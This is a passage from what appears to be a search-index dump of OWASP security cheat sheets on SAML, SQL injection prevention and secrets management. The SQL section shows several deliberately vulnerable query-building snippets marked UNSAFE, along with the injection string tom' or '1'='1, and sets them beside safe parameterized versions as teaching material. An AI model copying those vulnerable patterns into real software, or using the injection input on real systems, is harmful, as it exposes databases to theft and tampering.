"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#related-articles-and-references","title":"Related Articles and References","text":""},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html","title":"SAML Security Cheat Sheet","text":""},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The Security Assertion Markup Language (SAML) is an open standard for exchanging authorization and authentication information. The Web Browser SAML/SSO Profile with Redirect/POST bindings is one of the most common SSO implementations. This cheatsheet will focus primarily on that profile.

"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#validate-message-confidentiality-and-integrity","title":"Validate Message Confidentiality and Integrity","text":"

TLS 1.2 is the most common solution to guarantee message confidentiality and integrity at the transport layer. Refer to SAML Security (section 4.2.1) for additional information. This step will help counter the following attacks:

A digitally signed message with a certified key is the most common solution to guarantee message integrity and authentication. Refer to SAML Security (section 4.3) for additional information. This step will help counter the following attacks:

Assertions may be encrypted via XMLEnc to prevent disclosure of sensitive attributes post transportation. Refer to SAML Security (section 4.2.2) for additional information. This step will help counter the following attacks:

"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#validate-protocol-usage","title":"Validate Protocol Usage","text":"

This is a common area for security gaps - see Google SSO vulnerability for a real life example. Their SSO profile was vulnerable to a Man-in-the-middle attack from a malicious SP (Service Provider).

The SSO Web Browser Profile is most susceptible to attacks from trusted partners. This particular security flaw was exposed because the SAML Response did not contain all of the required data elements necessary for a secure message exchange. Following the SAML Profile usage requirements for AuthnRequest (4.1.4.1) and Response (4.1.4.2) will help counter this attack.

The AVANTSSAR team suggested the following data elements should be required:

"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#validate-signatures","title":"Validate Signatures","text":"

Vulnerabilities in SAML implementations due to XML Signature Wrapping attacks were described in 2012, On Breaking SAML: Be Whoever You Want to Be.

The following recommendations were proposed in response (Secure SAML validation to prevent XML signature wrapping attacks):

"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#validate-protocol-processing-rules","title":"Validate Protocol Processing Rules","text":"

This is another common area for security gaps simply because of the vast number of steps to assert.

Processing a SAML response is an expensive operation but all steps must be validated:

"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#validate-binding-implementation","title":"Validate Binding Implementation","text":""},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#validate-security-countermeasures","title":"Validate Security Countermeasures","text":"

Revisit each security threat that exists within the SAML Security document and assert you have applied the appropriate countermeasures for threats that may exist for your particular implementation.

Additional countermeasures considered should include:

Need an architectural diagram? The SAML technical overview contains the most complete diagrams. For the Web Browser SSO Profile with Redirect/POST bindings refer to the section 4.1.3. In fact, of all the SAML documentation, the technical overview is the most valuable from a high-level perspective.

"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#unsolicited-response-ie-idp-initiated-sso-considerations-for-service-providers","title":"Unsolicited Response (ie. IdP Initiated SSO) Considerations for Service Providers","text":"

Unsolicited Response is inherently less secure by design due to the lack of CSRF protection. However, it is supported by many vendors due to the backwards-compatibility feature of SAML 1.1. The general security recommendation is to not support this type of authentication, but if it must be enabled, the following steps (in addition to everything mentioned above) should help you secure this flow:

"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#identity-provider-and-service-provider-considerations","title":"Identity Provider and Service Provider Considerations","text":"

The SAML protocol itself is rarely the attack vector of choice, though it is still important to have cheatsheets to make sure its use is robust. The various endpoints are more frequently targeted, so how the SAML token is generated and how it is consumed are both important in practice.

"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#identity-provider-idp-considerations","title":"Identity Provider (IdP) Considerations","text":""},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#service-provider-sp-considerations","title":"Service Provider (SP) Considerations","text":""},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#input-validation","title":"Input Validation","text":"

Just because SAML is a security protocol does not mean that input validation goes away.

"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#cryptography","title":"Cryptography","text":"

Solutions relying on cryptographic algorithms need to follow the latest developments in cryptanalysis.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html","title":"SQL Injection Prevention Cheat Sheet","text":""},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article is focused on providing clear, simple, actionable guidance for preventing SQL Injection flaws in your applications. SQL Injection attacks are unfortunately very common, and this is due to two factors:

  1. the significant prevalence of SQL Injection vulnerabilities, and
  2. the attractiveness of the target (i.e., the database typically contains all the interesting/critical data for your application).

SQL Injection flaws are introduced when software developers create dynamic database queries constructed with string concatenation which includes user-supplied input. Avoiding SQL injection flaws is simple. Developers need to either: a) stop writing dynamic queries with string concatenation; and/or b) prevent user-supplied input which contains malicious SQL from affecting the logic of the executed query.

This article provides a set of simple techniques for preventing SQL Injection vulnerabilities by avoiding these two problems. These techniques can be used with practically any kind of programming language with any type of database. There are other types of databases, like XML databases, which can have similar problems (e.g., XPath and XQuery injection) and these techniques can be used to protect them as well.

Primary Defenses:

Additional Defenses:

Unsafe Example:

SQL injection flaws typically look like this:

The following (Java) example is UNSAFE, and would allow an attacker to inject code into the query that would be executed by the database. The unvalidated \"customerName\" parameter that is simply appended to the query allows an attacker to inject any SQL code they want. Unfortunately, this method for accessing databases is all too common.

String\u00a0query\u00a0=\u00a0\"SELECT\u00a0account_balance\u00a0FROM\u00a0user_data\u00a0WHERE\u00a0user_name\u00a0=\u00a0\"\n+\u00a0request.getParameter(\"customerName\");\ntry\u00a0{\nStatement\u00a0statement\u00a0=\u00a0connection.createStatement(\u00a0...\u00a0);\nResultSet\u00a0results\u00a0=\u00a0statement.executeQuery(\u00a0query\u00a0);\n}\n...\n
"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#primary-defenses","title":"Primary Defenses","text":""},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#defense-option-1-prepared-statements-with-parameterized-queries","title":"Defense Option 1: Prepared Statements (with Parameterized Queries)","text":"

The use of prepared statements with variable binding (aka parameterized queries) is how all developers should first be taught how to write database queries. They are simple to write, and easier to understand than dynamic queries. Parameterized queries force the developer to first define all the SQL code, and then pass in each parameter to the query later. This coding style allows the database to distinguish between code and data, regardless of what user input is supplied.

Prepared statements ensure that an attacker is not able to change the intent of a query, even if SQL commands are inserted by an attacker. In the safe example below, if an attacker were to enter the userID of tom' or '1'='1, the parameterized query would not be vulnerable and would instead look for a username which literally matched the entire string tom' or '1'='1.

Language specific recommendations:

In rare circumstances, prepared statements can harm performance. When confronted with this situation, it is best to either a) strongly validate all data or b) escape all user supplied input using an escaping routine specific to your database vendor as described below, rather than using a prepared statement.

Safe Java Prepared Statement Example:

The following code example uses a PreparedStatement, Java's implementation of a parameterized query, to execute the same database query.

//\u00a0This\u00a0should\u00a0REALLY\u00a0be\u00a0validated\u00a0too\nString\u00a0custname\u00a0=\u00a0request.getParameter(\"customerName\");\n//\u00a0Perform\u00a0input\u00a0validation\u00a0to\u00a0detect\u00a0attacks\nString\u00a0query\u00a0=\u00a0\"SELECT\u00a0account_balance\u00a0FROM\u00a0user_data\u00a0WHERE\u00a0user_name\u00a0=\u00a0?\u00a0\";\nPreparedStatement pstmt = connection.prepareStatement( query );\npstmt.setString(\u00a01,\u00a0custname);\nResultSet\u00a0results\u00a0=\u00a0pstmt.executeQuery(\u00a0);\n

Safe C# .NET Prepared Statement Example:

With .NET, it's even more straightforward. The creation and execution of the query doesn't change. All you have to do is simply pass the parameters to the query using the Parameters.Add() call as shown here.

String\u00a0query\u00a0=\u00a0\"SELECT\u00a0account_balance\u00a0FROM\u00a0user_data\u00a0WHERE\u00a0user_name\u00a0=\u00a0?\";\ntry\u00a0{\nOleDbCommand\u00a0command\u00a0=\u00a0new\u00a0OleDbCommand(query,\u00a0connection);\ncommand.Parameters.Add(new OleDbParameter(\"customerName\", CustomerName.Text));\nOleDbDataReader\u00a0reader\u00a0=\u00a0command.ExecuteReader();\n//\u00a0\u2026\n}\u00a0catch\u00a0(OleDbException\u00a0se)\u00a0{\n//\u00a0error\u00a0handling\n}\n

We have shown examples in Java and .NET but practically all other languages, including Cold Fusion, and Classic ASP, support parameterized query interfaces. Even SQL abstraction layers, like the Hibernate Query Language (HQL) have the same type of injection problems (which we call HQL Injection). HQL supports parameterized queries as well, so we can avoid this problem:

Hibernate Query Language (HQL) Prepared Statement (Named Parameters) Examples:

//First\u00a0is\u00a0an\u00a0unsafe\u00a0HQL\u00a0Statement\nQuery\u00a0unsafeHQLQuery\u00a0=\u00a0session.createQuery(\"from\u00a0Inventory\u00a0where\u00a0productID='\"+userSuppliedParameter+\"'\");\n//Here\u00a0is\u00a0a\u00a0safe\u00a0version\u00a0of\u00a0the\u00a0same\u00a0query\u00a0using\u00a0named\u00a0parameters\nQuery\u00a0safeHQLQuery\u00a0=\u00a0session.createQuery(\"from\u00a0Inventory\u00a0where\u00a0productID=:productid\");\nsafeHQLQuery.setParameter(\"productid\",\u00a0userSuppliedParameter);\n

For examples of parameterized queries in other languages, including Ruby, PHP, Cold Fusion, Perl, and Rust, see the Query Parameterization Cheat Sheet or this site.

Developers tend to like the Prepared Statement approach because all the SQL code stays within the application. This makes your application relatively database independent.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#defense-option-2-stored-procedures","title":"Defense Option 2: Stored Procedures","text":"

Stored procedures are not always safe from SQL injection. However, certain standard stored procedure programming constructs have the same effect as the use of parameterized queries when implemented safely which is the norm for most stored procedure languages.

They require the developer to just build SQL statements with parameters which are automatically parameterized unless the developer does something largely out of the norm. The difference between prepared statements and stored procedures is that the SQL code for a stored procedure is defined and stored in the database itself, and then called from the application. Both of these techniques have the same effectiveness in preventing SQL injection so your organization should choose which approach makes the most sense for you.

Note: \"Implemented safely\" means the stored procedure does not include any unsafe dynamic SQL generation. Developers do not usually generate dynamic SQL inside stored procedures. However, it can be done, but should be avoided. If it can't be avoided, the stored procedure must use input validation or proper escaping as described in this article to make sure that all user supplied input to the stored procedure can't be used to inject SQL code into the dynamically generated query. Auditors should always look for uses of sp_execute, execute or exec within SQL Server stored procedures. Similar audit guidelines are necessary for similar functions for other vendors.

There are also several cases where stored procedures can increase risk. For example, on MS SQL Server, you have 3 main default roles: db_datareader, db_datawriter and db_owner. Before stored procedures came into use, DBAs would give db_datareader or db_datawriter rights to the webservice's user, depending on the requirements. However, stored procedures require execute rights, which those roles do not grant by default. In some setups where user management has been centralized, but is limited to those 3 roles, web apps end up running under db_owner rights so the stored procedures can work. Naturally, that means that if a server is breached the attacker has full rights to the database, where previously they might only have had read access.

Safe Java Stored Procedure Example:

The following code example uses a CallableStatement, Java's implementation of the stored procedure interface, to execute the same database query. The sp_getAccountBalance stored procedure would have to be predefined in the database and implement the same functionality as the query defined above.

//\u00a0This\u00a0should\u00a0REALLY\u00a0be\u00a0validated\nString\u00a0custname\u00a0=\u00a0request.getParameter(\"customerName\");\ntry\u00a0{\nCallableStatement cs = connection.prepareCall(\"{call sp_getAccountBalance(?)}\");\ncs.setString(1, custname);\nResultSet\u00a0results\u00a0=\u00a0cs.executeQuery();\n//\u00a0\u2026\u00a0result\u00a0set\u00a0handling\n}\u00a0catch\u00a0(SQLException\u00a0se)\u00a0{\n//\u00a0\u2026\u00a0logging\u00a0and\u00a0error\u00a0handling\n}\n

Safe VB .NET Stored Procedure Example:

The following code example uses a SqlCommand, .NET's implementation of the stored procedure interface, to execute the same database query. The sp_getAccountBalance stored procedure would have to be predefined in the database and implement the same functionality as the query defined above.

\u00a0Try\nDim\u00a0command\u00a0As\u00a0SqlCommand\u00a0=\u00a0new\u00a0SqlCommand(\"sp_getAccountBalance\",\u00a0connection)\ncommand.CommandType = CommandType.StoredProcedure\ncommand.Parameters.Add(new SqlParameter(\"@CustomerName\", CustomerName.Text))\nDim\u00a0reader\u00a0As\u00a0SqlDataReader\u00a0=\u00a0command.ExecuteReader()\n'...\nCatch\u00a0se\u00a0As\u00a0SqlException\n'error\u00a0handling\nEnd\u00a0Try\n
"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#defense-option-3-allow-list-input-validation","title":"Defense Option 3: Allow-list Input Validation","text":"

Various parts of SQL queries aren't legal locations for the use of bind variables, such as the names of tables or columns, and the sort order indicator (ASC or DESC). In such situations, input validation or query redesign is the most appropriate defense. For the names of tables or columns, ideally those values come from the code, and not from user parameters.

But if user parameter values are used for targeting different table names and column names, then the parameter values should be mapped to the legal/expected table or column names to make sure unvalidated user input doesn't end up in the query. Please note, this is a symptom of poor design and a full rewrite should be considered if time allows.

Here is an example of table name validation.

String\u00a0tableName;\nswitch(PARAM):\n\u00a0\u00a0case\u00a0\"Value1\":\u00a0tableName\u00a0=\u00a0\"fooTable\";\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0break;\n\u00a0\u00a0case\u00a0\"Value2\":\u00a0tableName\u00a0=\u00a0\"barTable\";\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0break;\n\u00a0\u00a0...\n \u00a0default\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0:\u00a0throw\u00a0new\u00a0InputValidationException(\"unexpected\u00a0value\u00a0provided\"\n                                                  + \" for\u00a0table\u00a0name\");\n

The tableName can then be directly appended to the SQL query since it is now known to be one of the legal and expected values for a table name in this query. Keep in mind that generic table validation functions can lead to data loss as table names are used in queries where they are not expected.

For something simple like a sort order, it would be best if the user supplied input is converted to a boolean, and then that boolean is used to select the safe value to append to the query. This is a very standard need in dynamic query creation.

For example:

public\u00a0String\u00a0someMethod(boolean\u00a0sortOrder)\u00a0{\nString\u00a0SQLquery\u00a0=\u00a0\"some\u00a0SQL\u00a0...\u00a0order\u00a0by\u00a0Salary\u00a0\"\u00a0+\u00a0(sortOrder\u00a0?\u00a0\"ASC\"\u00a0:\u00a0\"DESC\");\n...\n

Any time user input can be converted to a non-String type, such as a date, numeric, boolean or enumerated type, before it is appended to a query or used to select a value to append to the query, it is safe to do so; see the example below.
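
For example, a small fragment in the same servlet style as the other examples in this cheat sheet (the parameter and column names are illustrative): converting the input to an int means no attacker-controlled string ever reaches the SQL text.

// Fails fast with NumberFormatException if the input is not a number.
int customerId = Integer.parseInt(request.getParameter("customerId"));
PreparedStatement pstmt = connection.prepareStatement(
    "SELECT account_balance FROM user_data WHERE customer_id = ?");
pstmt.setInt(1, customerId);
ResultSet results = pstmt.executeQuery();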

Input validation is also recommended as a secondary defense in ALL cases, even when using bind variables as is discussed later in this article. More techniques on how to implement strong input validation are described in the Input Validation Cheat Sheet.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#defense-option-4-escaping-all-user-supplied-input","title":"Defense Option 4: Escaping All User-Supplied Input","text":"

This technique should only be used as a last resort, when none of the above are feasible. Input validation is probably a better choice as this methodology is frail compared to other defenses and we cannot guarantee it will prevent all SQL Injections in all situations.

This technique is to escape user input before putting it in a query. It is very database specific in its implementation. It's usually only recommended to retrofit legacy code when implementing input validation isn't cost effective. Applications built from scratch, or applications requiring low risk tolerance should be built or re-written using parameterized queries, stored procedures, or some kind of Object Relational Mapper (ORM) that builds your queries for you.

This technique works as follows: each DBMS supports one or more character escaping schemes specific to certain kinds of queries. If you then escape all user-supplied input using the proper escaping scheme for the database you are using, the DBMS will not confuse that input with SQL code written by the developer, thus avoiding any possible SQL injection vulnerabilities.

The OWASP Enterprise Security API (ESAPI) is a free, open source, web application security control library that makes it easier for programmers to write lower-risk applications. The ESAPI libraries are designed to make it easier for programmers to retrofit security into existing applications. The ESAPI libraries also serve as a solid foundation for new development:

To find the javadoc specifically for the database encoders, click on the Codec class on the left hand side. There are lots of Codecs implemented. The two Database specific codecs are OracleCodec, and MySQLCodec.

Just click on their names in the All Known Implementing Classes: at the top of the Interface Codec page.

At this time, ESAPI currently has database encoders for:

Database encoders are forthcoming for:

If your database encoder is missing, please let us know.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#database-specific-escaping-details","title":"Database Specific Escaping Details","text":"

If you want to build your own escaping routines, here are the escaping details for each of the databases that we have developed ESAPI Encoders for:

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#oracle-escaping","title":"Oracle Escaping","text":"

This information is based on the Oracle Escape character information.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#escaping-dynamic-queries","title":"Escaping Dynamic Queries","text":"

To use an ESAPI database codec is pretty simple. An Oracle example looks something like:

ESAPI.encoder().encodeForSQL(\u00a0new\u00a0OracleCodec(),\u00a0queryparam\u00a0);\n

So, if you had an existing Dynamic query being generated in your code that was going to Oracle that looked like this:

String\u00a0query\u00a0=\u00a0\"SELECT\u00a0user_id\u00a0FROM\u00a0user_data\u00a0WHERE\u00a0user_name\u00a0=\u00a0'\"\n+\u00a0req.getParameter(\"userID\")\n+\u00a0\"'\u00a0and\u00a0user_password\u00a0=\u00a0'\"\u00a0+\u00a0req.getParameter(\"pwd\")\u00a0+\"'\";\ntry\u00a0{\nStatement\u00a0statement\u00a0=\u00a0connection.createStatement(\u00a0\u2026\u00a0);\nResultSet\u00a0results\u00a0=\u00a0statement.executeQuery(\u00a0query\u00a0);\n}\n

You would rewrite the first line to look like this:

Codec ORACLE_CODEC = new OracleCodec();\nString query = \"SELECT user_id FROM user_data WHERE user_name = '\"\n+ ESAPI.encoder().encodeForSQL( ORACLE_CODEC, req.getParameter(\"userID\"))\n+ \"' and user_password = '\"\n+ ESAPI.encoder().encodeForSQL( ORACLE_CODEC, req.getParameter(\"pwd\")) +\"'\";\n

And it would now be safe from SQL injection, regardless of the input supplied.

For maximum code readability, you could also construct your own OracleEncoder:

Encoder oe = new OracleEncoder();\nString query = \"SELECT user_id FROM user_data WHERE user_name = '\"\n+ oe.encode( req.getParameter(\"userID\")) + \"' and user_password = '\"\n+ oe.encode( req.getParameter(\"pwd\")) +\"'\";\n

With this type of solution, you would need only to wrap each user-supplied parameter being passed into an ESAPI.encoder().encodeForOracle( ) call or whatever you named the call and you would be done.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#turn-off-character-replacement","title":"Turn off character replacement","text":"

Use SET DEFINE OFF or SET SCAN OFF to ensure that automatic character replacement is turned off. If this character replacement is turned on, the & character will be treated like a SQLPlus variable prefix that could allow an attacker to retrieve private data.

See here and here for more information

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#escaping-wildcard-characters-in-like-clauses","title":"Escaping Wildcard characters in Like Clauses","text":"

The LIKE keyword allows for text scanning searches. In Oracle, the underscore _ character matches exactly one character, while the percent sign % matches zero or more occurrences of any character. These characters must be escaped in LIKE clause criteria.

For example:

SELECT\u00a0name\u00a0FROM\u00a0emp\u00a0WHERE\u00a0id\u00a0LIKE\u00a0'%/_%'\u00a0ESCAPE\u00a0'/';\n\nSELECT\u00a0name\u00a0FROM\u00a0emp\u00a0WHERE\u00a0id\u00a0LIKE\u00a0'%\\%%'\u00a0ESCAPE\u00a0'\\';\n
"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#oracle-10g-escaping","title":"Oracle 10g escaping","text":"

An alternative for Oracle 10g and later is to place { and } around the string to escape the entire string. However, you have to be careful that there isn't a } character already in the string. You must search for these and if there is one, then you must replace it with }}. Otherwise that character will end the escaping early, and may introduce a vulnerability.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#mysql-escaping","title":"MySQL Escaping","text":"

MySQL supports two escaping modes:

  1. ANSI_QUOTES SQL mode, and a mode with this off, which we call
  2. MySQL mode.

ANSI SQL mode: Simply encode all ' (single tick) characters with '' (two single ticks)

MySQL mode, do the following:

NUL (0x00) --> \\0  [This is a zero, not the letter O]\nBS  (0x08) --> \\b\nTAB (0x09) --> \\t\nLF  (0x0a) --> \\n\nCR  (0x0d) --> \\r\nSUB (0x1a) --> \\Z\n\"   (0x22) --> \\\"\n%   (0x25) --> \\%\n'   (0x27) --> \\'\n\\   (0x5c) --> \\\\\n_   (0x5f) --> \\_\nall other non-alphanumeric characters with ASCII values\nless than 256  --> \\c where 'c' is the original non-alphanumeric character.\n

This information is based on the MySQL Escape character information.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#sql-server-escaping","title":"SQL Server Escaping","text":"

We have not implemented the SQL Server escaping routine yet, but the following reference has good pointers and links to articles describing how to prevent SQL injection attacks on SQL Server: see here.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#db2-escaping","title":"DB2 Escaping","text":"

This information is based on DB2 WebQuery special characters as well as some information from Oracle's JDBC DB2 driver.

Information regarding differences between several DB2 Universal drivers is also available.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#hex-encoding-all-input","title":"Hex-encoding all input","text":"

A somewhat special case of escaping is the process of hex-encoding the entire string received from the user (this can be seen as escaping every character). The web application should hex-encode the user input before including it in the SQL statement. The SQL statement should take this into account, and compare the data accordingly.

For example, if we have to look up a record matching a sessionID, and the user transmitted the string abc123 as the session ID, the select statement would be:

SELECT\u00a0...\u00a0FROM\u00a0session WHERE\u00a0hex_encode(sessionID)\u00a0=\u00a0'616263313233'\n

hex_encode should be replaced by the particular facility for the database being used. The string 616263313233 is the hex-encoded version of the string received from the user (it is the sequence of hex values of the ASCII/UTF-8 codes of the user data).

If an attacker were to transmit a string containing a single-quote character followed by their attempt to inject SQL code, the constructed SQL statement will only look like:

... WHERE\u00a0hex_encode\u00a0(\u00a0...\u00a0)\u00a0=\u00a0'2720\u00a0...\u00a0'\n

27 being the ASCII code (in hex) of the single-quote, which is simply hex-encoded like any other character in the string. The resulting SQL can only contain numeric digits and letters a to f, and never any special character that could enable an SQL injection.
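
A small fragment in the same style as the other examples, showing how the application side could produce the hex-encoded value (hex_encode remains the database-specific placeholder used above; java.util.HexFormat requires Java 17+):

String sessionId = request.getParameter("sessionID");
// "abc123" becomes "616263313233"; the result can only contain [0-9a-f].
String hex = java.util.HexFormat.of()
        .formatHex(sessionId.getBytes(java.nio.charset.StandardCharsets.UTF_8));
String query = "SELECT ... FROM session WHERE hex_encode(sessionID) = '" + hex + "'";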

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#escaping-sqli-in-php","title":"Escaping SQLi in PHP","text":"

Use prepared statements and parameterized queries. These are SQL statements that are sent to and parsed by the database server separately from any parameters. This way it is impossible for an attacker to inject malicious SQL.

You basically have two options to achieve this:

  1. Using PDO (for any supported database driver):
$stmt = $pdo->prepare('SELECT * FROM employees WHERE name = :name');\n$stmt->execute(array('name' => $name));\nforeach ($stmt as $row) {\n    // do something with $row\n}\n
  2. Using MySQLi (for MySQL):
$stmt = $dbConnection->prepare('SELECT * FROM employees WHERE name = ?');\n$stmt->bind_param('s', $name);\n$stmt->execute();\n$result = $stmt->get_result();\nwhile ($row = $result->fetch_assoc()) {\n    // do something with $row\n}\n

PDO is the universal option. If you're connecting to a database other than MySQL, you can refer to a driver-specific second option (e.g. pg_prepare() and pg_execute() for PostgreSQL).

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#additional-defenses","title":"Additional Defenses","text":"

Beyond adopting one of the four primary defenses, we also recommend adopting all of these additional defenses in order to provide defense in depth. These additional defenses are:

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#least-privilege","title":"Least Privilege","text":"

To minimize the potential damage of a successful SQL injection attack, you should minimize the privileges assigned to every database account in your environment. Do not assign DBA or admin type access rights to your application accounts. We understand that this is easy, and everything just \"works\" when you do it this way, but it is very dangerous.

Start from the ground up to determine what access rights your application accounts require, rather than trying to figure out what access rights you need to take away. Make sure that accounts that only need read access are only granted read access to the tables they need access to.

If an account only needs access to portions of a table, consider creating a view that limits access to that portion of the data and assigning the account access to the view instead, rather than the underlying table. Rarely, if ever, grant create or delete access to database accounts.

If you adopt a policy where you use stored procedures everywhere, and don't allow application accounts to directly execute their own queries, then restrict those accounts to only be able to execute the stored procedures they need. Don't grant them any rights directly to the tables in the database.

SQL injection is not the only threat to your database data. Attackers can simply change a parameter value from one of the legal values they are presented with to a value that is unauthorized for them, but that the application itself is authorized to access. As such, minimizing the privileges granted to your application will reduce the likelihood of such unauthorized access attempts, even when an attacker is not trying to use SQL injection as part of their exploit.

While you are at it, you should minimize the privileges of the operating system account that the DBMS runs under. Don't run your DBMS as root or system! Most DBMSs run out of the box with a very powerful system account. For example, MySQL runs as system on Windows by default! Change the DBMS's OS account to something more appropriate, with restricted privileges.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#multiple-db-users","title":"Multiple DB Users","text":"

The designers of web applications should avoid using the same owner/admin account in the web applications to connect to the database. Different DB users should be used for different web applications.

In general, each separate web application that requires access to the database should have a designated database user account that the application will use to connect to the DB. That way, the designer of the application can have good granularity in the access control, thus reducing the privileges as much as possible. Each DB user will then have select access to what it needs only, and write-access as needed.

As an example, a login page requires read access to the username and password fields of a table, but no write access of any form (no insert, update, or delete). However, the sign-up page certainly requires insert privilege to that table; this restriction can only be enforced if these web apps use different DB users to connect to the database.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#views","title":"Views","text":"

You can use SQL views to further increase the granularity of access by limiting the read access to specific fields of a table or joins of tables. It could potentially have additional benefits: for example, suppose that the system is required (perhaps due to some specific legal requirements) to store the passwords of the users, instead of salted-hashed passwords.

The designer could use views to compensate for this limitation; revoke all access to the table (from all DB users except the owner/admin) and create a view that outputs the hash of the password field and not the field itself. Any SQL injection attack that succeeds in stealing DB information will be restricted to stealing the hash of the passwords (could even be a keyed hash), since no DB user for any of the web applications has access to the table itself.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#allow-list-input-validation","title":"Allow-list Input Validation","text":"

In addition to being a primary defense when nothing else is possible (e.g., when a bind variable isn't legal), input validation can also be a secondary defense used to detect unauthorized input before it is passed to the SQL query. For more information please see the Input Validation Cheat Sheet. Proceed with caution here. Validated data is not necessarily safe to insert into SQL queries via string building.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#related-articles","title":"Related Articles","text":"

SQL Injection Attack Cheat Sheets:

The following articles describe how to exploit different kinds of SQL injection vulnerabilities on various platforms; this article was created to help you avoid them:

Description of SQL Injection Vulnerabilities:

How to Avoid SQL Injection Vulnerabilities:

How to Review Code for SQL Injection Vulnerabilities:

How to Test for SQL Injection Vulnerabilities:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html","title":"Secrets Management Cheat Sheet","text":""},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#1-introduction","title":"1 Introduction","text":"

Secrets are used everywhere nowadays, especially with the popularity of the DevOps movement: Application Programming Interface (API) keys, database credentials, Identity and Access Management (IAM) permissions, Secure Shell (SSH) keys, certificates, and more. Many organizations have them hardcoded in source code in plaintext and littered throughout configuration files and configuration management tools.

There is a growing need for organizations to centralize the storage, provisioning, auditing, rotation and management of secrets to control access to secrets and prevent them from leaking and compromising the organization. Often, services share the same secrets, which makes identifying the source of compromise or leak challenging.

This cheat sheet offers best practices and guidelines to help properly implement secrets management.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#2-general-secrets-management","title":"2 General Secrets Management","text":"

The following sections address the main concepts relating to secrets management.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#21-high-availability","title":"2.1 High Availability","text":"

It is vital to select a technology that is robust enough to service traffic reliably:

Such a service could receive a considerable volume of requests within a large organization.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#22-centralize-and-standardize","title":"2.2 Centralize and Standardize","text":"

Secrets used by your DevOps teams for your applications might be consumed differently than secrets stored by your marketers or your SRE team. You often find poorly maintained secrets where the needs of secret consumers and producers do not match. Therefore, you must standardize and centralize the secrets management solution with care. Standardizing and centralizing can mean that you use multiple secrets management solutions. For instance: your cloud-native development teams choose to use the solution provided by the cloud provider, while your private cloud uses a third-party solution, and everybody has an account for a selected password manager. By making sure that the teams standardize the interaction with these different solutions, they remain maintainable and usable in the event of an incident. Even when a company centralizes its secrets management to just one solution, you will often have to secure the master secret of that secrets management solution in a secondary secrets management solution. For instance, you can use a cloud provider's facilities to store secrets, but that cloud provider's root/management credentials need to be stored somewhere else.

Standardization should include the secrets lifecycle as well as Authentication, Authorization, and Accounting of the secrets management solution. It should be immediately apparent to an organization what a secret is used for and where to find it. The more secrets management solutions you use, the more documentation you need.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#23-access-control","title":"2.3 Access Control","text":"

When users can read and/or update a secret in a secrets management system, it means the secret can now leak through those users and the systems they used to touch the secret. Therefore, engineers should not have access to all secrets in the secrets management system, and the Least Privilege principle should be applied. The secrets management system needs to provide the ability to configure fine-grained access controls on each object and component to accomplish the Least Privilege principle.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#24-automate-secrets-management","title":"2.4 Automate Secrets Management","text":"

Manual maintenance not only increases the risk of leakage; it also introduces the risk of human error while maintaining the secret. Furthermore, it can become wasteful. Therefore, it is better to limit or remove human interaction with the actual secrets. You can restrict human interaction in multiple ways:

Rotating certain keys, such as encryption keys, might trigger full or partial data re-encryption. Different strategies for rotating keys exist:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#25-auditing","title":"2.5 Auditing","text":"

